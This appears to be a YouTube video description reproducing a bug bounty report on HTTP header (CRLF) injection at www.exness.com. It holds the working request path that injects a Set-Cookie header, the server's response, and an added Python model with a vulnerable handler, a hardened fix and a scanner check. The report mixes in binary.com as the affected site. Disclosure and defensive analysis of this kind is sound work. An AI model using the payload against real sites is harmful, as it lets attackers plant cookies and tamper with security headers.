$200 Bounty - CRLF Injection - Http Response Splitting | www.exness.com |

  • mufazmi
  • 2022-04-13
  • 5164


Video description

CRLF Injection - Http Response Splitting


Description:
Summary:
The vulnerability is a classic HTTP header injection. By sending the following HTTP request it is possible to inject additional HTTP headers into the response:
Steps to Reproduce:
The issue can be reproduced with the following steps.
1) Send a GET request to the target URL, https://exness.com, with the payload shown below.


Request:
GET /%0Aset-cookie:%20hello=how;%0Aevil=evil; HTTP/2
Host: www.exness.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36


This HTTP request produces the following response. Note that the payload contains only %0A (a bare LF, no %0D), yet the server still wrote it into the header section as a line break: everything after the first %0A in the path ends up on its own line below Location.

Response:
HTTP/2 301 Moved Permanently
Date: Wed, 16 Mar 2022 22:15:24 GMT
Content-Type: text/html
Server: nginx/1.17.8
Location: /
Set-Cookie: hello=how;
Evil=evil;/:
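The following is an added example, not code from the report or from the target's real configuration. It models the behaviour visible in the response above with a stand-in redirect handler (an assumption) that URL-decodes the request path and copies it verbatim into Location, then shows the hardened variant that refuses control characters, plus a lenient header parser (the kind of client that accepts a bare LF as a line terminator) and a scanner check that flags a bare LF in a header block. The payload path is the one from the report; everything else is constructed.

```python
"""Model of the redirect-based header injection shown above (added example).

The server side is a stand-in, not Exness' actual setup: a redirect handler that
URL-decodes the request path and copies it, unchanged, into the Location header.
That is enough to reproduce what the page's response shows, where the text after
the first %0A appears as extra header lines.
"""
from __future__ import annotations

from urllib.parse import unquote

# Request path from the report (the only input taken from the page).
PAYLOAD_PATH = "/%0Aset-cookie:%20hello=how;%0Aevil=evil;"


def _redirect_bytes(location: str) -> bytes:
    """Serialise a minimal 301 whose Location value is taken verbatim from `location`."""
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def build_redirect_vulnerable(raw_path: str) -> bytes:
    """Vulnerable handler: the decoded path, CR/LF included, goes straight into Location."""
    return _redirect_bytes(unquote(raw_path) + "/")


def build_redirect_hardened(raw_path: str) -> bytes:
    """Hardened handler: refuse any decoded path that contains a control character.

    Answering 400 is the simplest fix. Percent-encoding the decoded value before
    emitting it is the alternative when arbitrary paths must survive the redirect.
    """
    decoded = unquote(raw_path)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return _redirect_bytes(decoded + "/")


def header_lines(resp: bytes) -> list[str]:
    """Split the header section the way a lenient client does: CRLF or bare LF ends a line."""
    head = resp.split(b"\r\n\r\n", 1)[0]
    return head.decode("latin-1").replace("\r\n", "\n").split("\n")[1:]  # drop status line


def parse_headers(resp: bytes) -> dict[str, str]:
    """Lower-cased name -> value for each well-formed `Name: value` line (first occurrence wins).

    Lines without a colon (like the injected `evil=evil;/`) are not headers and are skipped.
    """
    headers: dict[str, str] = {}
    for line in header_lines(resp):
        name, sep, value = line.partition(":")
        if sep and name.strip():
            headers.setdefault(name.strip().lower(), value.strip())
    return headers


def has_bare_lf(resp: bytes) -> bool:
    """Scanner check: a LF in the header section that is not part of a CRLF pair.

    Well-behaved servers terminate header lines with CRLF only, so a bare LF is a
    strong signal that request data was written into a header unescaped.
    """
    head = resp.split(b"\r\n\r\n", 1)[0]
    return b"\n" in head.replace(b"\r\n", b"")


if __name__ == "__main__":
    for label, build in (("vulnerable", build_redirect_vulnerable),
                         ("hardened", build_redirect_hardened)):
        resp = build(PAYLOAD_PATH)
        print(f"== {label} ==")
        print(resp.decode("latin-1"))
        print("bare LF in headers:", has_bare_lf(resp))
        print("set-cookie seen by lenient client:", parse_headers(resp).get("set-cookie"))
```

Against the vulnerable handler the lenient parse yields `set-cookie: hello=how;` exactly as in the report, while the hardened handler turns the same request into a 400 with a clean CRLF-only header block. The `has_bare_lf` check is the cheap triage test to run over a redirect endpoint's responses when the payload only contains %0A, as here.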

Supporting Material/References:
HTTP_HEADER_SPLITTING.mp4
Impact:
Since this attack does not require any user interaction to be exploited, an attacker could do many things with this vulnerability, for example by including a malicious URL.

As the example shows, the attacker can set cookies for the user on binary.com.
The attacker can disable or bypass security headers set by the server.

One restriction the attacker has is that the response is a redirect. This made it impossible for me to turn it into XSS or cache poisoning. Maybe you could look into this a bit further. However, I would argue that because user interaction is not needed and the attacker can set his own headers (including cookies), the attack is fairly scary.

All the videos are only for educational purpose.
#mufazmi


I'm Umair Farooqui, a passionate software engineer and security researcher dedicated to uncovering vulnerabilities in systems worldwide. With a strong background in ethical hacking, I delve into the intricacies of cybersecurity to safeguard digital infrastructures.

🔍 Hacking Experience:

I specialize in discovering and responsibly disclosing critical security issues. My portfolio includes successful hacks and disclosures impacting renowned organizations such as NASA and Paytm, earning recognition and appreciation for enhancing their security postures.

🎥 YouTube Channel:

On my YouTube channel, I share Proof of Concept (PoC) videos where I demonstrate how vulnerabilities were identified and exploited. Each video provides insights into the techniques used and the impact on security.

🌐 Connect with Me:
GitHub: https://github.com/mufazmi
Instagram: mufazmi
Twitter: mufazmi
HackerOne: https://hackerone.com/mufazmi
Bugcrowd: https://bugcrowd.com/mufazmi
Google Search: https://www.google.com/search?q=Umair...
Google Search: https://www.google.com/search?q=mufazmi

📱 Contact Me:
WhatsApp: +91 9867503256

Note: All content shared on this channel is for educational purposes only.


Join me in exploring the world of cybersecurity, one vulnerability at a time! Let's secure the digital landscape together. 💻🛡️
